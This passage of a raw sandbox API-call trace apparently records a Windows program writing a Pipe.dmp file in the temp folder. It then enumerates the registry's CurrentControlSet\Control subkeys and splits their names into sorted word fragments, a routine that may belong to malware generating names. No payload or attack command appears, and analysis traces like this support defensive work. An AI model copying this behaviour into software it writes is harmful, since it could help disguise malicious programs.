Flags=0x0, Size=0x34) returned 0x599130 [0065.954] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x599130, nSize=0x11 | out: lpDst="C:\\Windows\\TEMP\\") returned 0x11 [0065.954] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\", lpString2="Pipe" | out: lpString1="C:\\Windows\\TEMP\\Pipe") returned="C:\\Windows\\TEMP\\Pipe" [0065.954] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\Pipe", lpString2=".dmp" | out: lpString1="C:\\Windows\\TEMP\\Pipe.dmp") returned="C:\\Windows\\TEMP\\Pipe.dmp" [0065.954] CreateFileW (lpFileName="C:\\Windows\\TEMP\\Pipe.dmp" (normalized: "c:\\windows\\temp\\pipe.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0065.959] SetFilePointer (in: hFile=0x94, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0065.959] SetEndOfFile (hFile=0x94) returned 1 [0065.959] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1001af6) returned 0x0 [0065.959] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0x98) returned 0x0 [0065.960] RegEnumKeyW (in: hKey=0x98, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0065.960] lstrlenW (lpString="ACPI") returned 4 [0065.960] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599170 [0065.960] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0065.960] lstrlenW (lpString="AGP") returned 3 [0065.960] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599190 [0065.960] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0065.960] lstrlenW (lpString="AppID") returned 5 [0065.960] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x5991b0 [0065.960] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0065.962] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12) returned 0x599350 [0065.962] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0065.962] lstrlenW (lpString="Arbiters") returned 8 [0065.962] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x593e68 [0065.962] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0065.962] lstrlenW (lpString="BackupRestore") returned 13 [0065.962] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x593e90 [0065.962] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x593eb8 [0065.962] RegEnumKeyW (in: hKey=0x98, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0065.962] lstrlenW (lpString="Class") returned 5 [0065.962] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599370 [0065.963] RegEnumKeyW (in: hKey=0x98, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0065.963] lstrlenW (lpString="CMF") returned 3 [0065.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599390 [0065.963] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0065.963] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0065.963] RegEnumKeyW (in: hKey=0x98, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0065.963] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0065.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12) returned 0x5993b0 [0065.963] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0065.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x593ee0 [0065.963] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0065.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x22) returned 0x599880 [0065.963] RegEnumKeyW (in: hKey=0x98, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0065.963] lstrlenW (lpString="COM Name Arbiter") returned 16 [0065.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x5993d0 [0065.963] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0065.963] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0065.963] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0065.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x5998b0 [0065.963] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0065.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x593f08 [0065.963] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0065.964] RegEnumKeyW (in: hKey=0x98, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0065.964] lstrlenW (lpString="ComputerName") returned 12 [0065.964] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x593f30 [0065.964] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0065.964] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x5998d0 [0065.964] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0065.964] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0065.964] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5998d0 | out: hHeap=0x580000) returned 1 [0065.964] RegEnumKeyW (in: hKey=0x98, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0065.964] lstrlenW (lpString="ContentIndex") returned 12 [0065.964] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x593f58 [0065.964] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0065.964] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0065.964] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x5998d0 [0065.964] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0065.964] RegEnumKeyW (in: hKey=0x98, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0065.964] lstrlenW (lpString="CrashControl") returned 12 [0065.964] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x5998f0 [0065.964] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0065.965] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0065.965] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x593f80 [0065.965] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0065.965] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0065.965] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0065.965] RegEnumKeyW (in: hKey=0x98, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0065.965] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0065.965] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x593fa8 [0065.965] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0065.965] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0065.965] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x593fd0 [0065.965] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0065.965] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0065.965] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593fd0 | out: hHeap=0x580000) returned 1 [0065.965] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x593fd0 [0065.965] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0065.965] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0065.965] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0065.965] RegEnumKeyW (in: hKey=0x98, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0065.965] lstrlenW (lpString="Cryptography") returned 12 [0065.965] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26) returned 0x599910 [0065.965] RegEnumKeyW (in: hKey=0x98, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0065.965] lstrlenW (lpString="DeviceClasses") returned 13 [0065.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x593ff8 [0065.966] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0065.966] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0065.966] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x593ff8 | out: hHeap=0x580000) returned 1 [0065.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x593ff8 [0065.966] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0065.966] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0065.966] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0065.966] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0065.966] RegEnumKeyW (in: hKey=0x98, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0065.966] lstrlenW (lpString="DeviceOverrides") returned 15 [0065.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x594020 [0065.966] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0065.966] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0065.966] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594020 | out: hHeap=0x580000) returned 1 [0065.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x594020 [0065.966] RegEnumKeyW (in: hKey=0x98, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0065.966] lstrlenW (lpString="Diagnostics") returned 11 [0065.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x24) returned 0x599940 [0065.966] RegEnumKeyW (in: hKey=0x98, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0065.966] lstrlenW (lpString="Els") returned 3 [0065.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599988 [0065.967] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0065.967] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0065.967] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0065.967] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0065.967] RegEnumKeyW (in: hKey=0x98, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0065.967] lstrlenW (lpString="Errata") returned 6 [0065.967] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x594048 [0065.967] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0065.967] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0065.967] RegEnumKeyW (in: hKey=0x98, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0065.967] lstrlenW (lpString="FileSystem") returned 10 [0065.967] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x5999a8 [0065.967] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0065.967] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0065.967] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x594070 [0065.967] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0065.967] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0065.968] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0065.968] RegEnumKeyW (in: hKey=0x98, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0065.968] lstrlenW (lpString="FileSystemUtilities") returned 19 [0065.968] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x5999c8 [0065.968] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0065.968] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0065.968] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0065.968] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5999c8 | out: hHeap=0x580000) returned 1 [0065.968] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x594098 [0065.968] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0065.968] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0065.968] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0065.968] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0065.968] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594098 | out: hHeap=0x580000) returned 1 [0065.968] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x594098 [0065.968] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0065.968] RegEnumKeyW (in: hKey=0x98, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0065.968] lstrlenW (lpString="GraphicsDrivers") returned 15 [0065.968] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x5940c0 [0065.968] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0065.968] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0065.968] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0065.969] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0065.969] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x5940e8 [0065.969] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0065.969] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0065.969] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0065.969] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0065.969] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0065.969] RegEnumKeyW (in: hKey=0x98, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0065.969] lstrlenW (lpString="GroupOrderList") returned 14 [0065.969] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x5999c8 [0065.969] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0065.969] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0065.969] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0065.969] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x5999e8 [0065.969] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0065.969] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0065.969] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0065.969] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0065.969] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599a08 [0065.969] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0065.969] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0065.970] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0065.970] RegEnumKeyW (in: hKey=0x98, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0065.970] lstrlenW (lpString="HAL") returned 3 [0065.970] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599a28 [0065.970] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0065.970] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0065.970] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0065.970] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0065.970] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0065.970] RegEnumKeyW (in: hKey=0x98, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0065.970] lstrlenW (lpString="IDConfigDB") returned 10 [0065.970] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x594110 [0065.970] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0065.970] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0065.970] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0065.970] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0065.970] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0065.970] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12) returned 0x599a48 [0065.970] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0065.970] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0065.971] RegEnumKeyW (in: hKey=0x98, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0065.971] lstrlenW (lpString="Keyboard Layout") returned 15 [0065.971] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x594138 [0065.971] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0065.971] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x594160 [0065.971] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0065.971] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0065.971] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0065.971] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0065.971] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0065.971] lstrlenW (lpString="Keyboard Layouts") returned 16 [0065.971] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x594188 [0065.971] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0065.971] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0065.972] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0065.972] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0065.972] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0065.972] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594188 | out: hHeap=0x580000) returned 1 [0065.972] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x594188 [0065.972] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0065.972] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0065.972] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0065.972] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0065.972] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0065.972] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0065.972] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0065.972] lstrlenW (lpString="Lsa") returned 3 [0065.972] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599a68 [0065.972] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0065.972] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0065.972] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0065.972] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0065.972] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0065.972] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0065.972] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0065.972] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0065.973] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599a88 [0065.973] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0065.973] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0065.973] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0065.973] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0065.973] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0065.973] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0065.973] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0065.973] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599a88 | out: hHeap=0x580000) returned 1 [0065.973] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5941b0 [0065.973] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0065.973] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0065.973] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x5941d8 [0065.973] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0065.973] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0065.973] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0065.973] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0065.973] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0065.973] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0065.973] lstrlenW (lpString="LsaInformation") returned 14 [0065.973] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599a88 [0065.973] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0065.974] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0065.974] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0065.974] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0065.974] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0065.974] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0065.974] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0065.974] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599a88 | out: hHeap=0x580000) returned 1 [0065.974] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x24) returned 0x59a170 [0065.974] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0065.974] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0065.974] lstrlenW (lpString="MediaCategories") returned 15 [0065.974] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599a88 [0065.974] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0065.974] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0065.974] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0065.974] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0065.974] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0065.974] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x22) returned 0x59a1a0 [0065.974] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0065.974] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0065.974] lstrlenW (lpString="MediaDRM") returned 8 [0065.974] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599aa8 [0065.975] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0065.975] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0065.975] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0065.975] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0065.975] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0065.975] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0065.975] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599aa8 | out: hHeap=0x580000) returned 1 [0065.975] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599aa8 [0065.975] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0065.975] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0065.975] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0065.975] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0065.975] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0065.975] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0065.976] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0065.976] RegEnumKeyW (in: hKey=0x98, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0065.976] lstrlenW (lpString="MediaInterfaces") returned 15 [0065.976] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599ac8 [0065.976] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0065.976] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0065.976] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ac8 | out: hHeap=0x580000) returned 1 [0065.976] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x22) returned 0x59a1d0 [0065.976] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0065.976] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0065.976] RegEnumKeyW (in: hKey=0x98, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0065.976] lstrlenW (lpString="MediaProperties") returned 15 [0065.976] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599ac8 [0065.976] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0065.976] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0065.977] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0065.977] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ac8 | out: hHeap=0x580000) returned 1 [0065.977] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x22) returned 0x59a200 [0065.977] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0065.977] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0065.977] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0065.977] RegEnumKeyW (in: hKey=0x98, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0065.977] lstrlenW (lpString="MediaTypes") returned 10 [0065.977] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599ac8 [0065.977] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0065.977] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0065.977] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0065.977] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0065.977] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0065.977] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0065.977] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ac8 | out: hHeap=0x580000) returned 1 [0065.977] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599ac8 [0065.977] lstrcmpW (lpString1="class", lpString2="types") 